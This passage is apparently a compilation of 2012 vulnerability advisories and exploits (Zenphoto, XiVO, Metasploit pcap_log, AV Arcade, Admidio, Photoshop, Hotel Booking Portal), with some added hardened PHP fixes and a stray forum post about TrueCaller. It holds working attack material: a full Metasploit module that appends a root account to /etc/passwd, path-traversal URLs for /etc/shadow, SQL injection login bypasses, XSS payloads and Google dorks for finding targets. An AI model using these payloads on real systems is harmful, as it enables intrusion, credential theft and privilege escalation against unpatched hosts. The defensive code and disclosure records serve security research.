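$tagsort  = '"><script>alert(123);</script>';                          // section 14
$album    = "');alert('xss";                                           // section 13
$ndeleted = '1<script>alert(123);</script>';                           // section 18
$errorGet = urldecode('%253cscript%253ealert(123);%253c/script%253e'); // what $_GET holds after the server's single decode (section 15)

echo '<form name="tag_delete" action="?delete=true&amp;tagsort=' . h($tagsort) . '">', "\n";
echo "\$('#albumtitle').val(" . js($album) . ");\n";   // js() supplies the quotes
echo deletedHeading($ndeleted), "\n";
echo errorHeading($errorGet), "\n";
```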


    ###############################################################################
    19. Reflected XSS in "zp-core/zp-extensions/GoogleMap/m.php"
    ###############################################################################

    Reason: insufficient sanitization of html output
    Attack vector: user-supplied GET parameter "data"
    Preconditions: none
    Remarks: bypasses IE, Chrome and Safari anti-XSS features

    Php script "zp-core/zp-extensions/GoogleMap/m.php" line 57:
    ------------------------[ source code start ]----------------------------------
    $mapdata = base64_decode(str_replace(' ', '+', sanitize($_GET['data'])));
    if ($mapdata) {
        if (function_exists('bzcompress')) {
            $mapdata = bzdecompress($mapdata);
        } else {
            $mapdata = gzuncompress($mapdata);
        }
        $mapdata = unserialize($mapdata);
    }
    ...
    if (is_array($mapdata)) {
        $MAP_OBJECT = new GoogleMapAPI(sanitize($_GET['type']));
        ...
        foreach ($mapdata as $key=>$datum) {
            $MAP_OBJECT->$key = $datum;
        }
        ...
        echo $MAP_OBJECT->printMap();
    ------------------------[ source code end ]------------------------------------

    We can see that the user-supplied GET parameter "data" is base64-decoded, then
    decompressed and unserialized into the array "mapdata". This is followed by the
    creation of a "GoogleMapAPI" object, after which the array "mapdata" is used to
    populate the "GoogleMapAPI" object's members. This means that the attacker is
    able to manipulate arbitrary members of the "GoogleMapAPI" object.

    Php script "zp-core/zp-extensions/GoogleMap/GoogleMap.php" line 304:
    ------------------------[ source code start ]----------------------------------
    class GoogleMapAPI {
        ...
        var $js_alert = '<b>Javascript must be enabled in order to use Google Maps.</b>';
        ...
        function printMap() {
            echo $this->getMap();
        ...
        function getMap() {
            ...
            if(!empty($this->js_alert)) {
                $_output .= '<noscript>' . $this->js_alert . '</noscript>' . "\n";
    ------------------------[ source code end ]------------------------------------

    We can see that the "GoogleMapAPI" member "js_alert" is used in the method
    "printMap()". Therefore the attacker can overwrite "js_alert" with an XSS payload.

    For testing we first need serialized, compressed and base64-encoded data. This
    can be obtained using the PHP script below:
    -------------------------[ test code start ]-----------------------------------
    <?php
    error_reporting(E_ALL);
    $arr = array();
    $arr['js_alert']='</noscript><script>alert(123);</script>';
    $bz = base64_encode(bzcompress(serialize($arr)));
    $gz = base64_encode(gzcompress(serialize($arr)));
    echo "bz: $bz\n";
    echo "gz: $gz\n";
    ?>
    --------------------------[ test code end ]------------------------------------

    Tests:

    In case of bz compression:

    http://localhost/zenphoto1433/zp-core/zp-extensions/GoogleMap/m.php?data=QlpoNDFBWSZTWcu%2fgEMAAA%2bbgBBguH0AAKo13AogAFRQAAADIGVNNNGmZIMBGEgGPQOa%2flg2jGWBuiGSqXfdt1NRk8QHt7GpsF8DBGJPFBvxdyRThQkMu%2fgEMA


    In case of gz compression:

    http://localhost/zenphoto1433/zp-core/zp-extensions/GoogleMap/m.php?data=eJxLtDK0qi62srBSyiqOT8xJLSpRsi62Mra0UrLRz8svTi7KLCixs4HSYHkNQyNjTWsbfaiYknUtAP1BFmU


    ###############################################################################
    20. Full Path Disclosure in multiple scripts
    ###############################################################################

    http://localhost/zenphoto1433/themes/default/theme_description.php

    Fatal error: Call to undefined function gettext() in
    C:\apache_www\zenphoto1433\themes\default\theme_description.php on line 4

    More affected scripts:

    themes/effervescence_plus/colorbox/functions.php
    themes/effervescence_plus/simpleviewer/functions.php
    themes/effervescence_plus/functions.php
    themes/effervescence_plus/index.php
    themes/effervescence_plus/sidebar.php
    themes/effervescence_plus/theme_description.php
    themes/garland/colorbox/functions.php
    themes/garland/contact_form/form.php
    themes/garland/functions.php
    themes/garland/index.php
    themes/garland/sidebar.php
    themes/garland/theme_description.php
    themes/garland/themeoptions.php
    themes/stopdesign/comment_form/comment_form.php
    themes/stopdesign/contact_form/form.php
    themes/stopdesign/comment.php
    themes/stopdesign/functions.php
    themes/stopdesign/normalizer.ph
    themes/stopdesign/theme_description.php
    themes/zenpage/footer.php
    themes/zenpage/functions.php
    themes/zenpage/sidebar.php
    themes/zenpage/theme_description.php
    themes/zpmobile/comment_form/comment_form.php
    themes/zpmobile/functions.php
    themes/zpmobile/theme_description.php

    zp-core/utilities/refresh_database.php
    zp-core/utilities/refresh_metadata.php
    zp-core/404.php
    zp-core/auth_zp.php
    zp-core/class-album.php
    zp-core/class-comment.php
    zp-core/class-gallery.php
    zp-core/class-image.php
    zp-core/class-load.php
    zp-core/class-search.php
    zp-core/class-transientimage.php
    zp-core/controller.php
    zp-core/functions-controller.php
    zp-core/functions-i18n.php
    zp-core/lib-GD.php
    zp-core/lib-Imagick.php
    zp-core/lib-utf8.php

    zp-core/zp-extensions/admin-approval.php

    many more scripts in "/zp-core/zp-extensions/" directory


    Disclosure timeline:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    15.10.2012 -> Contacted developers
    15.10.2012 -> Developers asked for details
    15.10.2012 -> Sent details to developers
    02.11.2012 -> Patched version 1.4.3.4 released
    03.11.2012 -> Advisory released


    Contact:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Waraxe forum: http://www.waraxe.us/forums.html
    Personal homepage: http://www.janekvind.com/
    Random project: http://albumnow.com/
    ---------------------------------- [ EOF ] ------------------------------------

    Source: Zenphoto 1.4.3.3 Multiple Vulnerabilities
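A hardened counterpart to the m.php pattern described in the advisory above, added here as an example and not Zenphoto's own code: the decoder never calls unserialize(), accepts only an allowlisted set of typed scalar fields, and escapes the message that is echoed into the `<noscript>` block. The function names, the `MAP_FIELDS` allowlist and the use of JSON as the inner encoding are assumptions for the example.

```php
<?php
// Added example, not Zenphoto code: safely accept a client-supplied "data"
// parameter of the shape m.php expects (base64 of zlib-compressed content),
// without letting the client choose which object members get written.

// Fields a client may set, each with the type it must have (assumed names).
const MAP_FIELDS = ['width' => 'int', 'height' => 'int',
                    'zoom'  => 'int', 'map_type' => 'string'];

/**
 * Hardened decoder: expects base64(gzcompress(json)), never calls
 * unserialize(), keeps only allowlisted keys of the right type and
 * rejects the whole request when an allowlisted key has the wrong type.
 * Returns null on any malformed input.
 */
function decode_map_data(string $data): ?array {
    $raw = base64_decode($data, true);            // strict mode: reject junk
    if ($raw === false) return null;
    $json = @gzuncompress($raw);                  // false on corrupt stream
    if ($json === false) return null;
    $arr = json_decode($json, true, 2);           // depth 2: flat array only
    if (!is_array($arr)) return null;
    $clean = [];
    foreach (MAP_FIELDS as $key => $type) {
        if (!array_key_exists($key, $arr)) continue;
        $value = $arr[$key];
        $ok = ($type === 'int' && is_int($value))
           || ($type === 'string' && is_string($value) && strlen($value) <= 64);
        if (!$ok) return null;
        $clean[$key] = $value;
    }
    return $clean;                                // keys not in MAP_FIELDS are dropped
}

// Output side: whatever ends up inside <noscript> is HTML-escaped, so a
// value such as "</noscript><script>..." cannot close the element.
function noscript_block(string $message): string {
    return '<noscript>' . htmlspecialchars($message, ENT_QUOTES, 'UTF-8') . "</noscript>\n";
}

// Constructed input modelled on the advisory's payload, sent as JSON:
// 'js_alert' is not allowlisted and never reaches the object.
$payload = ['js_alert' => '</noscript><script>alert(123);</script>', 'zoom' => 5];
$data    = base64_encode(gzcompress(json_encode($payload)));
var_dump(decode_map_data($data));
var_dump(decode_map_data('not base64!'));         // malformed input is rejected
echo noscript_block('<b>Javascript must be enabled.</b>');
```

Populate the GoogleMapAPI object only from the array this function returns; members with no entry keep their defaults.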

  2. Xivo 1.2 Arbitrary File Download

    Xivo 1.2 Arbitrary File Download under root privileges
    ===============================================================

    Date: 6/11/2012
    Exploit Author: Mr.Un1k0d3r
    Vendor Homepage: https://wiki.xivo.fr
    Software Link: https://wiki.xivo.fr/index.php/XiVO_1.1-Gallifrey/Install_XiVO_With_CD
    Version: 1.2 (last patched version)
    Tested on: Linux xivo 2.6.32-5-486

    Exploit:
    Using the web interface you can download any file from the system. The web application is running under root privileges.
    You can download clear text passwords, /etc/passwd, /etc/shadow and many more...

    POC:
    https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/passwd
    https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/shadow
    https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/manager.conf
    https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/cel_pgsql.conf

    This vulnerability was discovered by Mr.Un1k0d3r from RingZer0 Team.

    Exploit-DB Note:
    This appears to have been fixed
    https://projects.xivo.fr/issues/3912
    http://git.xivo.fr/?p=official/xivo-skaro.git;a=commit;h=127ab43e6d8e8ed94f16ff388fb62fd611a40e19

    Source: Xivo 1.2 Arbitrary File Download
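For the export handler described in the advisory above, here is an added example (not XiVO's code) of resolving a client-supplied certificate id to a file without letting `..` segments leave the certificate directory. The directory path, the `.pem` naming convention and the function name are assumptions; the demo builds a temporary directory so it runs offline.

```php
<?php
// Added example, not XiVO code: resolve an untrusted "id" to a file inside
// one directory, rejecting anything that would escape it.

const CERT_DIR = '/var/lib/example/certs';   // assumed location for the example

/**
 * Map an untrusted id to an absolute path under $base, or return null when
 * the id is not a plain token or the resolved file is not inside $base.
 */
function resolve_certificate_path(string $id, string $base = CERT_DIR): ?string {
    // 1. Structural check: the id must be a simple token, never a path,
    //    so "../../../../etc/passwd" is refused before touching the disk.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $id)) {
        return null;
    }
    // 2. Canonicalize both sides and confirm containment, so symlinks or
    //    unusual normalisation cannot move the file outside the base.
    $real_base = realpath($base);
    $real_file = realpath($base . DIRECTORY_SEPARATOR . $id . '.pem');
    if ($real_base === false || $real_file === false) {
        return null;                         // base or file does not exist
    }
    $prefix = $real_base . DIRECTORY_SEPARATOR;
    if (strncmp($real_file, $prefix, strlen($prefix)) !== 0) {
        return null;                         // resolved outside the base
    }
    return $real_file;
}

// Self-contained demo: a temporary certificate directory with one constructed
// file, then the advisory's traversal ids and one legitimate id are checked.
$tmp = sys_get_temp_dir() . '/certs_' . bin2hex(random_bytes(4));
mkdir($tmp, 0700);
file_put_contents("$tmp/server.pem", "-----BEGIN CERTIFICATE-----\nconstructed\n");

$ids = ['server',
        '../../../../etc/passwd',
        '../../../../etc/shadow',
        '../../../../etc/asterisk/manager.conf'];
foreach ($ids as $id) {
    $path = resolve_certificate_path($id, $tmp);
    printf("%-40s -> %s\n", $id, $path === null ? 'REJECTED' : 'serve ' . basename($path));
}
unlink("$tmp/server.pem");
rmdir($tmp);
```

The path check addresses only the traversal; the advisory's second point, the web application running as root, is a deployment matter and is fixed by running the service under an unprivileged account.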

  3. Metasploit < v4.4 pcap_log Plugin Privilege Escalation Exploit

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##

    require 'msf/core'
    require 'rex'
    require 'msf/core/post/common'
    require 'msf/core/post/file'
    require 'msf/core/post/linux/priv'
    require 'msf/core/exploit/local/linux_kernel'
    require 'msf/core/exploit/local/linux'
    require 'msf/core/exploit/local/unix'

    load 'lib/msf/core/post/common.rb'
    load 'lib/msf/core/post/file.rb'
    load 'lib/msf/core/exploit/local/unix.rb'
    load 'lib/msf/core/exploit/local/linux.rb'

    class Metasploit3 < Msf::Post
      Rank = ExcellentRanking

      include Msf::Post::File
      include Msf::Post::Common

      include Msf::Exploit::Local::Linux
      include Msf::Exploit::Local::Unix

      def initialize(info={})
        super( update_info( info, {
          'Name'           => 'Metasploit pcap_log Local Privilege Escalation',
          'Description'    => %q{
            Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
            creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
            filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.
            This, and all the other packets, are appended to /etc/passwd.

            Successful exploitation results in the creation of a new superuser account.

            This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd.
          },
          'License'        => MSF_LICENSE,
          'Author'         => [ '0a29406d9794e4f9b30b3c5d6702c708'],
          'Platform'       => [ 'linux','unix','bsd' ],
          'SessionTypes'   => [ 'shell', 'meterpreter' ],
          'References'     =>
            [
              [ 'BID', '54472' ],
              [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
              [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
            ],
          'DisclosureDate' => "Jul 16 2012",
          'Targets'        =>
            [
              [ 'Linux/Unix Universal', {} ],
            ],
          'DefaultTarget'  => 0,
        }
        ))
        register_options(
          [
            Opt::RPORT(2940),
            OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]),
            OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ])
          ], self)
      end

      def run
        print_status "Waiting for victim"
        initial_size = cmd_exec("cat /etc/passwd | wc -l")
        i = 60
        while(true) do
          if (i == 60)
            # 0a2940: cmd_exec is slow, so send 1 command to do all the links
            cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
            i = 0
          end
          i = i+1
          if (cmd_exec("cat /etc/passwd | wc -l") != initial_size)
            # PCAP is flowing
            pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
            print_status("Sending file contents payload to #{session.session_host}")
            udpsock = Rex::Socket::Udp.create(
              {
                'Context' => {'Msf' => framework, 'MsfExploit'=>self}
              })
            udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
            break
          end
          sleep(1)
        end

        if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
          print_good("Success. You should now be able to login or su to the 'metasploit' user with password 'metasploit'.")
        else
          print_error("Failed. You should manually verify the 'metasploit' user has not been added")
        end
        # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
        # However because the session is not a terminal, su will not always allow this.
      end
    end

    Source: Metasploit < v4.4 pcap_log Plugin Privilege Escalation Exploit

  4. This is a call tracer application which traces the person name via his phone number

    Name of application : TrueCaller

    For Blackberry users: Just go to App World and search Truecaller and voila :)

    Still find any probs? Refer to the link for download: http://handheld.softpedia.com/get/System...8870.shtml

    For Android users: Just go to Android Market and search Truecaller and voila :)

    Still find any probs? Refer to the link for download: http://www.truecaller.com/blog/2011/11/2...-download/

    For Apple users: Search Truecaller :)

    Still find any probs? Refer to the link for download: Get TrueCaller - Caller ID for your mobile with TrueCaller

    Alternatively you can browse to m.truecaller.com and download directly on your mobile :)

    Source: http://hackforums.net

  5. AV Arcade Free Edition (add_rating.php, id parameter) Blind SQL Injection

    ##########################################
    [~] Exploit Title: AV Arcade Free Edition Blind SQL Injection
    [~] Date: 31/08/2012
    [~] Author: DaOne (@LibyanCA)
    [~] Software Link: http://www.avscripts.net/avarcade/freearcadescript/
    [~] Google Dork: intext:"Powered by AV Arcade Free Edition"
    ##########################################

    # Exploit-DB Note: Must be logged in.

    [#] [ Exploit ]

    http://localhost/content/add_rating.php?id=[Blind SQL Injection]


    ##########################################
    [*] thanks to : All LibyanCA Members ()
    ##########################################

    Source: AV Arcade Free Edition (add_rating.php, id parameter) Blind SQL Injection

  6. Admidio 2.3.5 Multiple Vulnerabilities

    Advisory: Admidio 2.3.5 Multiple security vulnerabilities
    Advisory ID: SSCHADV2012-019
    Author: Stefan Schurtz
    Affected Software: Successfully tested on Admidio 2.3.5
    Vendor URL: http://www.admidio.org/
    Vendor Status: fixed

    ==========================
    Vulnerability Description
    ==========================

    Admidio 2.3.5 is prone to XSS and SQLi vulnerabilities

    ==================
    PoC-Exploit
    ==================

    //SQLi

    http://[target]/admidio-2.3.5/adm_program/modules/lists/lists.php?active_role=[sql-injection]

    //XSS

    http://[target]/admidio-2.3.5/adm_program/modules/guestbook/guestbook_new.php?headline=" onmouseover=alert(/xss/) "

    =========
    Solution
    =========

    Upgrade to the latest version 2.3.6

    ====================
    Disclosure Timeline
    ====================

    21-Aug-2012 - developer informed
    21-Aug-2012 - feedback from developer
    28-Aug-2012 - fixed in version 2.3.6

    ========
    Credits
    ========

    Vulnerabilities found and advisory written by Stefan Schurtz.

    ===========
    References
    ===========

    http://www.admidio.org/forum/viewtopic.php?t=5108
    http://www.darksecurity.de/advisories/2012/SSCHADV2012-019.txt

    Source: Admidio 2.3.5 Multiple Vulnerabilities

  7. Adobe Photoshop CS6 PNG Parsing Heap Overflow

    #####################################################################################
    Application: Adobe Photoshop CS6 PNG Parsing Heap Overflow

    Platforms: Windows & Macintosh
    Versions: 13.x
    Secunia: SA49141

    {PRL}: 2012-27

    Author: Francis Provencher (Protek Research Lab's)

    Website: http://www.protekresearchlab.com/

    Twitter: @ProtekResearch

    #####################################################################################

    1) Introduction
    2) Report Timeline
    3) Technical details
    4) POC


    #####################################################################################

    ===============
    1) Introduction
    ===============

    Adobe Photoshop is a graphics editing program developed and published by Adobe Systems Incorporated.
    Adobe's 2003 "Creative Suite" rebranding led to Adobe Photoshop 8's renaming to Adobe Photoshop CS.
    Thus, Adobe Photoshop CS6 is the 13th major release of Adobe Photoshop. The CS rebranding also resulted
    in Adobe offering numerous software packages containing multiple Adobe programs for a reduced price.
    Adobe Photoshop is released in two editions: Adobe Photoshop, and Adobe Photoshop Extended, with the
    Extended having extra 3D image creation, motion graphics editing, and advanced image analysis features.
    Adobe Photoshop Extended is included in all of Adobe's Creative Suite offerings except Design Standard,
    which includes the Adobe Photoshop edition. Alongside Photoshop and Photoshop Extended, Adobe also
    publishes Photoshop Elements and Photoshop Lightroom, collectively called "The Adobe Photoshop Family".
    In 2008, Adobe released Adobe Photoshop Express, a free web-based image editing tool to edit photos directly
    on blogs and social networking sites; in 2011 a version was released for the Android operating system and the
    iOS operating system. Adobe only supports Windows and Macintosh versions of Photoshop, but using Wine,
    Photoshop CS6 can run well on Linux.

    (http://en.wikipedia.org/wiki/Adobe_Photoshop)
    #####################################################################################

    ============================
    2) Report Timeline
    ============================

    2012-05-10 Vulnerability reported to Secunia
    2012-08-31 Publication of this advisory

    #####################################################################################

    ============================
    3) Technical details
    ============================
    The vulnerability is caused due to a boundary error in the "Standart MultiPlugin.8BF" module
    when processing a Portable Network Graphics (PNG) image. This can be exploited to cause
    a heap-based buffer overflow via a specially crafted "tRNS" chunk size. Successful exploitation
    may allow execution of arbitrary code, but requires tricking a user into opening a malicious image.

    #####################################################################################

    ===========
    4) POC
    ===========

    http://www.protekresearchlab.com/exploits/PRL-2012-27.png
    http://www.exploit-db.com/sploits/20971.png

    Source: Adobe Photoshop CS6 PNG Parsing Heap Overflow

  8. Hotel Booking Portal v0.1 Multiple Vulnerabilities

    # -----------------------------------------------------------
    # _____ _ _ _ _
    # / ____(_) | | | | |
    # | | _| |_ __ _ __| | ___| |
    # | | | | __/ _` |/ _` |/ _ \ |
    # | |____| | || (_| | (_| | __/ |
    # \_____|_|\__\__,_|\__,_|\___|_|
    #
    # -----------------------------------------------------------
    # Hotel Booking Portal v0.1 Multiple Vulnerabilities
    # Google dork: "Made And Powered By Hotels Portal"
    # Bug discovered by Yakir Wizman, <yakir.wizman@gmail.com>
    # Date 09/08/2012
    # Download - http://sourceforge.net/projects/hbportal/
    # ISRAEL
    # -----------------------------------------------------------
    # Author will not be responsible for any damage.
    # -----------------------------------------------------------
    # I. DESCRIPTION
    # -----------------------------------------------------------
    # 1). A vulnerability exists in 'login.php' - Allows for 'SQL injection' of the 'email' and 'password' POST parameters.
    # 2). A vulnerability exists in 'searchresults.php' - Allows for 'SQL injection' of the 'country' POST parameter.
    # 3). A vulnerability exists in 'includes/languagebar.php' - Allows for 'Cross site scripting' of the 'window.location' js
    # 4). A vulnerability exists in 'administrator/login.php' - Allows for 'Cross site scripting' of the 'window.location' js
    # 5). A vulnerability exists in 'index.php' - Allows for 'Cross site scripting' of the 'lang' GET parameter.
    #
    # -----------------------------------------------------------
    # II. PoC EXPLOIT
    # -----------------------------------------------------------
    # 1). POST a form to login.php with the value of:
    # email set to : ' or '1'='1
    # password set to : ' or '1'='1
    # 2). POST to searchresults.php with the value of 'country' set to Armenia' and sleep(1)='
    # 3). http://127.0.0.1/hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script>
    # 4). http://127.0.0.1/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script>
    # 5). http://127.0.0.1/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script>
    # -----------------------------------------------------------

    Source: Hotel Booking Portal v0.1 Multiple Vulnerabilities
